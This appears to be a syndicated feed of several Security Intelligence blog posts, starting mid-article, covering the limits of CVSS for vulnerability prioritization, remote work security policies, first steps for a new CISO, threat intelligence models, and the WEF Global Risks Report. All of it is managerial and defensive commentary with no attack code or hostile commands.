For example, consider two different vulnerabilities. One vulnerability has a low impact on the availability of web servers; the other exposes users’ email addresses (low confidentiality). Both could easily have the same CVSS base score of 5.3, but the availability issue may receive an environmental score of 5.8 because it affects a customer service portal and management considers the availability requirement to be high.

Even if the confidentiality issue received a similar adjustment, there is no metric to measure the impact General Data Protection Regulation (GDPR) requirements may add to the risk of exposing customer data, which significantly increases the value of the email addresses. The report backs up this argument, stating: “We have no evidence that CVSS accounts for any of the following: the type of data an information system (typically) processes, the proper operation of the system, the context in which the vulnerable software is used, or the material consequences of an attack.”

The report also highlights that the CVSS does not consider relationships between vulnerabilities that allow an attacker to pivot or escalate privileges as well as security issues that are not strictly defined as vulnerabilities, such as insecure misconfigurations. These all play a role in evaluating risk status and response prioritization.

“In general, severity should only be a part of vulnerability response prioritization,” the report notes. “One might also consider exploit likelihood or whether exploits are publicly available. The Exploit Code Maturity vector (in Temporal Metrics) attempts to address exploit likelihood, but the default value assumes widespread exploitation, which is not realistic.”

The temporal metrics, however, are only designed to lower the base score and are rarely updated, if published at all. Asset value and exploitation are common risk factors and must be considered when prioritizing vulnerabilities.

The Subjective Angle of the CVSS

At X-Force Red, we are hired to break into organizations to uncover risky vulnerabilities that criminal attackers may use for their gain. Our team works with a plethora of vulnerabilities on a daily basis, and we do agree that while the CVSS has its role, it should not be the only factor in determining how to prioritize vulnerabilities. Two of the factors that need a more objective metric are the potential for exploitation and the criticality of the asset.

Let’s consider the fact that CVSS scores are assigned by vendors or researchers at a point in time and rarely rescored as circumstances change. For example, the temporal metric, if considered at all, is based on exploitation that is known at the time. As a result, CVSS scores can be more subjective and may not consider critical context around the assets the vulnerability is exposing, or whether criminals are actively weaponizing the vulnerability.

When it comes to using the CVSS to prioritize response to vulnerabilities, our X-Force Red hackers have seen time and time again vulnerabilities with CVSS scores of 10 bumped to the top of the priority list even though the assets they could affect would only cause minimal impact to the business if they were compromised. High scores were also attributed to vulnerabilities even when criminals were not exploiting them in the wild at that time.

Meanwhile, vulnerabilities with CVSS scores of 5 sit lower on the priority list even though they could expose high-value assets and are being actively weaponized by criminals. As a result, the vulnerability scored as 10 gets fixed first, leaving criminals ample time to exploit the more detrimental issues that scored a mere 5.

CVSS score

Figure 1: This graphic shows that even though the vulnerability MS17-010 has the most correlated exploits (41), it still sits lower on the priority list because it has a lower CVSS score. Meanwhile, the vulnerability at the top of the list has fewer correlated exploits yet has a CVSS score of 10.

Striking a New Balance With Vulnerability Prioritization

At X-Force Red, we believe vulnerabilities should be ranked based on the importance of the exposed asset to the organization and whether the vulnerability is being weaponized by criminals.

To help security professionals prioritize remediation, our team built a proprietary algorithm, which is part of X-Force Red’s Vulnerability Management Services (VMS). This algorithm automatically prioritizes vulnerabilities considering those contextual factors — asset value and whether the vulnerability is being weaponized — in addition to the CVSS score.

With X-Force Red Vulnerability Management Services, the chart above would look like this:


Vulnerability prioritization matrix using X-Force Red's VMS

Figure 2: Vulnerability prioritization matrix when using X-Force Red’s VMS. Notice the vulnerability with the most correlated exploits — MS17-010 — is at the top even though the CVSS score is lower than others on the list.

Consider the risk equation, which, depending on who you ask, may vary. While the classic risk calculation is risk = likelihood x impact, some risk experts describe it as:

Risk = threat + vulnerability + asset of value.

Without a threat exploiting a vulnerability, the risk should definitely be scored lower. If the vulnerability doesn’t affect an asset of value, it should not rank highest on the prioritization list until that situation changes.

By considering the impact to the business, if the exposed asset were compromised, and if the vulnerability is being exploited, vulnerabilities could be prioritized based on the actual risk to critical assets, data or business operations. It is this sort of context we would like to bring into the vulnerability factor of the overall risk equation.

Learn more about X-Force Red Vulnerability Management Services

The post Calling Into Question the CVSS appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Abby Ross

Data Breach, Data Protection, Endpoint, Endpoint Protection, General Data Protection Regulation (GDPR), Incident Response (IR), Mobile Security, Network Security, regulatory compliance, Remote Access, Security Strategy,

Employees Are Working From Home — Do You Know Where Your Remote Work Policy Is?

The remote work trend is here to stay — and it’s a growing phenomenon.

Nearly two-thirds (63 percent) of companies have employees who work remotely, yet more than half of those companies (57 percent) do not have a remote work policy, according to a 2018 report from the freelancing website Upwork. What’s more, many of the companies that do have a remote work policy said it hasn’t been updated in the past five years or has become more lenient over that time.

Remote work security is a lot like mobile security, and the work-at-home trend is a lot like the bring-your-own-device (BYOD) trend. You likely have a policy that covers mobile security. You need one that covers remote work.

What Could Go Wrong?

The elevated exposure associated with remote work is undeniable. In fact, it’s not even a controversial point. According to Shred-it, 86 percent of C-level executives believe that the risk of a data breach is higher when employees work remotely. Additionally, CybSafe reported that one-third of U.K. businesses have suffered a data breach because of remote work in the past 12 months.

All of those numbers make sense. Simply working outside the office comes with inherent risks. Remote workers are more likely to connect via insecure WiFi, either at home or while working in public spaces such as coffee shops. A study by OneLogin even found that more than half of remote workers spend up to one day per week connected to unsecured networks.

Sensitive conversations — or talk that could help threat actors do their work — involving remote workers are more likely to take place in writing (via chat or email) than in person, which creates a record that could be accessed by cybercriminals. Work-from-home employees are also more likely to mix professional and personal equipment, software, data and online activity. That means threat actors could more easily breach personal consumer hardware and software as an entry point into company networks. In other words, hacking a remote worker may offer a higher payoff than hacking an in-office employee.

Furthermore, remote, freelance and contract workers are more likely to use their own equipment and perform their own IT tasks than in-office staff. And most remote workers are neither experts in choosing secure hardware nor skilled in the complexities of IT security. They’re also more vulnerable to hardware theft, shoulder surfing and other risks.

Don’t Forget About Compliance

Beyond the obvious security risks, remote work policies dramatically enhance regulatory compliance. The General Data Protection Regulation (GDPR) led the way, California followed, and soon, many U.S. states will have strong regulations around security and privacy. Yet many of the remote work policies currently in place were created before the GDPR even started making headlines.

A good remote work policy covers a broad range of categories, from employment rules to expense reporting to legal obligations. But the data security provisions are probably the most important. And because the security and regulatory landscapes — as well as attitudes and demands around remote work — keep changing, your company’s remote work policy should keep changing too.

Components of a Good Remote Work Policy

Clearly, it’s important to create a good remote work policy if you don’t have one — or update the one you’ve got to reflect current realities and best practices. But what exactly makes a good policy?

First, create a detailed plan for communication and training related to remote workers, and specify this plan in the policy. Clarify that the remote work policy applies to all workers, even if they do work at home one hour a month. Keep in mind the differences (legal and otherwise) between permanent, full-time employees on the one hand and contract, freelance, temporary or contingent workers on the other. Your policy is one tool for the company to help employees boost security in their homes, which is always a good idea.

Next, align the policy with remote work infrastructure and software. Be clear about rules for company-owned equipment. List all user tools (e.g., cloud document platforms, workgroup communication, video conferencing, project management, etc.) so that remote and in-office employees are all on the same page — literally — and using the same approved and security-monitored tools.

You’ll then want to draft a notification process in the event of a security event and include the steps that each employee must take in the event of a breach. Include clear actions to keep operating systems, applications, certificates, and security and networking software up to date. Include all applicable in-office rules, such as the password policy and other security-related rules. It’s also important to make remote work policies compatible with employee contracts — i.e., make sure overlapping or contradicting areas are addressed.

Lastly, make sure you plan to monitor policy adoption and adherence. Learn from security successes and failures and keep the policy flexible. Importantly, update the remote work policy frequently by setting a schedule for reviewing it on a regular basis.

Address Your Remote Security Gap

The bottom line is that the reality of remote work extends the enterprise attack surface to include employees’ homes. It’s vital to address this gaping hole with a clear, up-to-date remote work policy that is consistently monitored and enforced.

The post Employees Are Working From Home — Do You Know Where Your Remote Work Policy Is? appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Mike Elgan

Business Continuity, Career, Chief Information Security Officer (CISO), CISO, Endpoint Protection, Executives, Incident Response (IR), Incident Response Plan, IT Infrastructure, Log Management, Risk Management, Security Awareness, Security Information and Event Management (SIEM), Security Leadership, Security Management, Security Training, Skills Gap,

6 Steps Every New CISO Should Take to Set Their Organization Up for Success

Congrats! You’ve landed a new job as a chief information security officer (CISO). Now where do you start?

With some figures putting the typical CISO tenure at just around two years, it’s clear turnover in this role is high. According to a Ponemon Institute study sponsored by Opus, 44 percent of CISOs surveyed said they plan to make a lateral move in their organization outside of IT security, and 40 percent said they expect to change careers. All of this considered, the window of time to make a mark as an effective security leader is short — and, in turn, stressful.

What are some best practices for getting started on the path to success in a new security management position? What do you need to do, who do you need to talk to, and what are the first actions you need to take to make an immediate impact and set yourself up for future wins?

Here are six steps to help you get started in a new security executive role.

1. Take Stock of Technology

One of the most important steps you will take in the first few days is reviewing the IT infrastructure of your new company. How are firewalls and servers configured? How many different endpoints connect to the network? What other technology is in place?

According to CSO, you should start by taking stock of which incident prevention security controls are preventing and reporting on malicious activity. You should also determine which security control management consoles, security information and event management (SIEM) tools, and log management solutions are collecting logs and alerts.

Understanding your systems and defenses is priority No. 1 because knowing what your new organization has in place — and where you may need to make additions and changes — will inform the next steps in your first few months in the CISO role.

2. Assess Your Processes

After gaining a comprehensive view into the technology that is in place, it is time to review and evaluate the processes in place for security. Is there an incident response (IR) plan in place? For 77 percent of organizations, the answer is no. Is the IR plan written and tested? What about awareness training? Is it done monthly? Annually? This information will give you a clearer picture of how the company has prioritized security in the past — and an idea of where it needs to go in the future.

This is also the time to poke holes in policies and standards that do not have formal processes attached, and develop and define them to be more effective. Clear, well-defined processes minimize confusion and chaos, and ensure your organization can comply with the policies you want to enforce.

3. Build Out Your Team

Whether you are utilizing existing employees or hiring new team members, building your security team is an immediate priority for a new security leader, according to Dan Lohrmann, former CISO for the state of Michigan and current chief security officer and chief strategist at Security Mentor.

“Focus on talent and relationships,” Lohrmann wrote in an article for Government Technology. “Surround yourself with security pros that work well together and cover skill set weaknesses.”

Direct reports that you will be managing are the first employees you need to get to know. Have one-on-one meetings with each team member if time allows to understand their strengths, weaknesses and insights on where security strategy stands in the organization. These employees have the institutional knowledge you don’t yet have and have dealt with issues and problems already. This time can also be an opportunity to build a relationship of trust so that your direct reports know they can come to you with concerns and feedback going forward.

If you have the luxury of hiring, after getting to know the existing security team, now is the time to assess whether you are lacking certain skills and talent on your team and look to the external talent pool to add to your ranks. This may be easier said than done, since the cybersecurity skills gap has made hiring challenging in recent years.

4. Talk to Key Internal Stakeholders

You want to gain a deeper understanding of the business, its mission, its immediate priorities and its long-term goals as soon as you get in the door. The CISO role is about security and business enablement. You will be expected to protect the organization and contribute to strategic goals.

Start by meeting with executive management when possible, as well as heads of business units. Understand their goals, visions, pain points and objectives. Ask how security management can assist with all of these. Getting to know these stakeholders will be the start of what should be an ongoing relationship and conversation that will give security a strong voice in the organization.

5. Get to Know Customers

Equally important to understanding the executive vision of the company is having a solid comprehension of the people the company serves. Getting to know key customers and clients on the front lines will give you the advantage of grasping how the enterprise is viewed from the outside. The customer lens of the organization will be invaluable in positioning security as a business driver instead of a hindrance.

6. Start Thinking About Your Budget

Gartner predicted that companies would spend around $96 billion on security products and services in 2018. But how can CISOs prove their investments had a measurable impact on corporate risk? It is no longer enough to simply deliver security to an organization; CISOs are also expected to demonstrate return on investment (ROI) and find ways to deliver direct business benefits.

Collecting data, evidence and metrics to demonstrate the need for security investments, why they are necessary in the near future and the proof of corporate payoff is another essential step for new security management. Additionally, this needs to be positioned in a way that business leaders understand, which takes us back to the importance of the prior steps. Without investing time in getting to know executive management and understanding customers, you will be less equipped to make the case for budgetary dollars for security priorities down the road.

Start Your CISO Tenure Off on the Right Foot

Starting a new job in the CISO role can feel overwhelming. But the time for security to be seen as a key player — and to have a major business impact — has never been better. While there may be multiple challenges to address right out of the gate in a new organization, heed these suggestions to start making a positive impact on day one.

The post 6 Steps Every New CISO Should Take to Set Their Organization Up for Success appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Joan Goodchild

Cyberthreats, Incident Response (IR), orchestration, Security Operations Center (SOC), Threat Detection, threat hunting, Threat Intelligence, Threat Management, Threat Monitoring, Threat Prevention, Threat Response, Threat Sharing,

It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare

When a client asked me to help build a cyberthreat intelligence program recently, I jumped at the opportunity to try something new and challenging. To begin, I set about looking for some rudimentary templates with a good outline for building a threat intelligence process, a few solid platforms that are user-friendly, the basic models for cyber intelligence collection and a good website for describing various threats an enterprise might face. This is what I found:

  1. There are a handful of rudimentary templates for building a good cyberthreat intelligence program available for free online. All of these templates leave out key pieces of information that any novice to the cyberthreat intelligence field would be required to know. Most likely, this is done to entice organizations into spending copious amounts of money on a specialist.
  2. The number of companies that specialize in the collection of cyberthreat intelligence is growing at a ludicrous rate, and they all offer something that is different, unique to certain industries, proprietary, automated via artificial intelligence (AI) and machine learning, based on pattern recognition, or equipped with behavioral analytics.
  3. The basis for all threat intelligence is heavily rooted in one of three basic models: Lockheed Martin’s Cyber Kill Chain, MITRE’s ATT&CK knowledge base and The Diamond Model of Intrusion Analysis.
  4. A small number of vendors working on cyberthreat intelligence programs or processes published a complete list of cyberthreats, primary indicators, primary actors, primary targets, typical attack vectors and potential mitigation techniques. Of that small number, very few were honest when there was no useful mitigation or defensive strategy against a particular tactic.
  5. All of the cyberthreat intelligence models in use today have gaps that organizations will need to overcome.
  6. A search within an article content engine for helpful articles with the keyword “threat intelligence” produced more than 3,000 results, and a Google search produces almost a quarter of a million. This is completely ridiculous. Considering how many organizations struggle to find experienced cyberthreat intelligence specialists to join their teams — and that cyberthreats grow by the day while mitigation strategies do not — it is not possible that there are tens of thousands of professionals or experts in this field.

It’s no wonder why organizations of all sizes in a variety of industries are struggling to build a useful cyberthreat intelligence process. For companies that are just beginning their cyberthreat intelligence journey, it can be especially difficult to sort through all these moving parts. So where do they begin, and what can the cybersecurity industry do to adapt traditional threat intelligence models to the cyber battlefield?

How to Think About Thinking

A robust threat intelligence process serves as the basis for any cyberthreat intelligence program. Here is some practical advice to help organizations plan, build and execute their program:

  1. Stop and think about the type(s) of cyberthreat intelligence data the organization needs to collect. For example, if a company manufactures athletic apparel for men and women, it is unnecessary to collect signals, geospatial data or human intelligence.
  2. How much budget is available to collect the necessary cyberthreat intelligence? For example, does the organization have the budget to hire threat hunters and build a cyberthreat intelligence program uniquely its own? What about purchasing threat intelligence as a service? Perhaps the organization should hire threat hunters and purchase a threat intelligence platform for them to use? Each of these options has a very different cost model for short- and long-term costs.
  3. Determine where cyberthreat intelligence data should be stored once it is obtained. Does the organization plan to build a database or data lake? Does it intend to store collected threat intelligence data in the cloud? If that is indeed the intention, pause here and reread step one. Cloud providers have very different ideas about who owns data, and who is ultimately responsible for securing that data. In addition, cloud providers have a wide range of security controls — from the very robust to a complete lack thereof.
  4. How does the organization plan to use collected cyberthreat intelligence data? It can be used for strategic purposes, tactical purposes or both within an organization.
  5. Does the organization intend to share any threat intelligence data with others? If yes, then you can take the old cybersecurity industry adage “trust but verify” and throw it out. The new industry adage should be “verify and then trust.” Never assume that an ally will always be an ally.
  6. Does the organization have enough staff to spread the workload evenly, and does the organization plan to include other teams in the threat intelligence process? Organizations may find it very helpful to include other teams, either as strategic partners, such as vulnerability management, application security, infrastructure and networking, and risk management teams, or as tactical partners, such as red, blue and purple teams.

How Can We Adapt Threat Intelligence Models to the Cyber Battlefield?

As mentioned above, the threat intelligence models in use today were not designed for cyber warfare. They are typically linear models, loosely based on Carl Von Clausewitz’s military strategy and tailored for warfare on a physical battlefield. It’s time for the cyberthreat intelligence community to define a new model, perhaps one that is three-dimensional, nonlinear, rooted in elementary number theory and that applies vector calculus.

Much like game theory, The Diamond Model of Intrusion Analysis is sufficient if there are two players (the victim and the adversary), but it tends to fall apart if the adversary is motivated by anything other than sociopolitical or socioeconomic payoff, if there are three or more players (e.g., where collusion, cooperation and defection of classic game theory come into play), or if the adversary is artificially intelligent. In addition, The Diamond Model of Intrusion Analysis attempts to show a stochastic model diagram but none of the complex equations behind the model — probably because that was someone’s 300-page Ph.D. thesis in applied mathematics. This is not much help to the average reader or a newcomer to the threat intelligence field.

Nearly all models published thus far are focused on either external actors or insider threats, as though a threat actor must be one or the other. None of the widely accepted models account for, or include, physical security.

While there are many good articles about reducing alert fatigue in the security operations center (SOC), orchestrating security defenses, optimizing the SOC with behavioral analysis and so on, these articles assume that the reader knows what any of these things mean and what to do about any of it. A veteran in the cyberthreat intelligence field would have doubts that behavioral analysis and pattern recognition are magic bullets for automated threat hunting, for example, since there will always be threat actors that don’t fit the pattern and whose behavior is unpredictable. Those are two of the many reasons why the fields of forensic psychology and criminal profiling were created.

Furthermore, when it comes to the collection of threat intelligence, very few articles provide insight on what exactly constitutes “useful data,” how long to store it and which types of data analysis would provide the best insight.

It would be a good idea to get the major players in the cyberthreat intelligence sector together to develop at least one new model — but preferably more than one. It’s time for industry leaders to develop new ways of classifying threats and threat actors, share what has and has not worked for them, and build more boundary connections than the typical socioeconomic or sociopolitical ones. The sector could also benefit from looking ahead at what might happen if threat actors choose to augment their crimes with algorithms and AI.

The post It’s Time to Modernize Traditional Threat Intelligence Models for Cyber Warfare appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Kelly Ryver

Artificial Intelligence (AI), C-Suite, Chief Information Security Officer (CISO), Cryptography, cyber risk, Data Protection, fraud, General Data Protection Regulation (GDPR), Incident Response (IR), Infrastructure Security, Machine Learning, Quantum Computing, regulatory compliance, Risk Management, Security Leadership, World Economic Forum (WEF),

Manage Emerging Cybersecurity Risks by Rallying Around Mutual Concerns

Global risks are intensifying but the collective will to tackle them appears to be lacking. — The World Economic Forum’s “Global Risks Report 2019”

With the start of a new calendar year, chief information security officers (CISOs) are looking for ways to set the tone for the year and have more engaged conversations with top leadership regarding cybersecurity risks. The good news is January provided such an opportunity, but it’s not what you might expect.

Every year, the world’s elite descends on Davos, Switzerland, as part of the global gathering known as the World Economic Forum (WEF). A few weeks before they hold this event, the WEF releases its “Global Risks Report,” and this year, once again, cyber risks figured prominently. The report was based on survey responses from nearly 1,000 decision-makers from the business and government sectors, academia, nongovernmental organizations (NGOs), and other international organizations.

Cybersecurity Risks Once Again in the Top 5

The report opens with its distinctive global risks landscape diagram, and cyber-related risks fall in the top-right quadrant of global risks, both in terms of likelihood and impact. When it comes to likelihood, data fraud or theft came in fourth place after three environmental risks, with cyberattacks rounding out the top five.

When ranked by impact, cyberattacks still made it into the top 10, in seventh place, followed immediately by critical information infrastructure breakdown. The fact that data fraud or theft wasn’t in the top 10 risks by impact might indicate that markets and business leaders are more confident about the global economy’s ability to detect and respond to such an event.

This is by no means the first time that technology-related risks made it to the top of the list: Cyberattacks have appeared four times in the top five risks by likelihood since 2010 (in 2012, 2014, 2018 and 2019). However, in terms of impact, the only technology-related risk to make the top five was critical information infrastructure breakdown in 2014.

Is it symptomatic of a larger disconnect that, in the last decade, global leaders only once perceived a technology-related risk as a top-five risk in terms of impact? Do top leadership and board directors at your organization share this attitude?

A Conversation Starter for CISOs and Top Leadership

Of course, the WEF report is aimed at a global audience of business and government executives, so it might not be immediately apparent how CISOs could benefit from grabbing a copy and leafing through it. However, because technology-based risks — and more specifically, cyber-related risks — feature so prominently in the report, there is a unique opportunity to engage or re-engage top leadership and boards to discuss these issues and re-evaluate the organization’s current risk appetite. Among the topics covered in the report are many areas that CISOs should be ready to engage on, including:

  • Machine learning and artificial intelligence (AI) — How, if at all, is your organization leveraging these technologies? Is the security function engaged at the earliest part of the process to implement them?

  • Regulatory changes, such as the General Data Protection Regulation (GDPR) — Is your organization now fully compliant with the GDPR? Are there other GDPR-like regulations on the horizon that need to be on your radar?

  • Interconnectedness of cybersecurity risks — Is your organization on its way to becoming cyber resilient? How often is your organization’s resilience put to the test?

  • Quantum computing and cryptography — Who, if anyone, is keeping track of developments in quantum computing? How often is this disruptive technology being discussed, both in terms of the opportunities it presents, but also the risks to traditional cryptographic methods of protecting company secrets?

Interconnectedness Versus Resilience

If there’s one section of the report that CISOs should share with top leadership, it is the portion titled “Managing in the Age of Meltdowns” (just three pages long). As the interconnectedness of technology increases the potential for cascading failures, this section reminds us of the stakes: “When something goes wrong in a complex system, problems start popping up everywhere, and it is hard to figure out what’s happening. And tight coupling means that the emerging problems quickly spiral out of control and even small errors can cascade into massive meltdowns.”

The section covers different strategies to help deal with complex, dynamic systems and provides guidance for CISOs to review and improve the effectiveness of existing processes. Strategies include encouraging healthy skepticism and recognizing the value of clear and honest lines of reporting. CISOs should also try to “imagine failure” or, better yet, simulate a breach to practice their response. The report also reminds security leaders to perform thorough root-cause analysis, as “too often, we base decisions on predictions that are overly simplistic, missing important possible outcomes.”

Find a Rallying Point

Most CISOs know they’re more likely to be heard when aligning their messages and efforts with the concerns of top leadership. In a world of increasing global risks, security leaders must engage with all levels of the organization to truly understand what cybersecurity risks are top of mind, from the board and C-suite all the way down to entry-level analysts. Organizing around mutual concerns will help maximize security at the enterprise.

The post Manage Emerging Cybersecurity Risks by Rallying Around Mutual Concerns appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Christophe Veltsos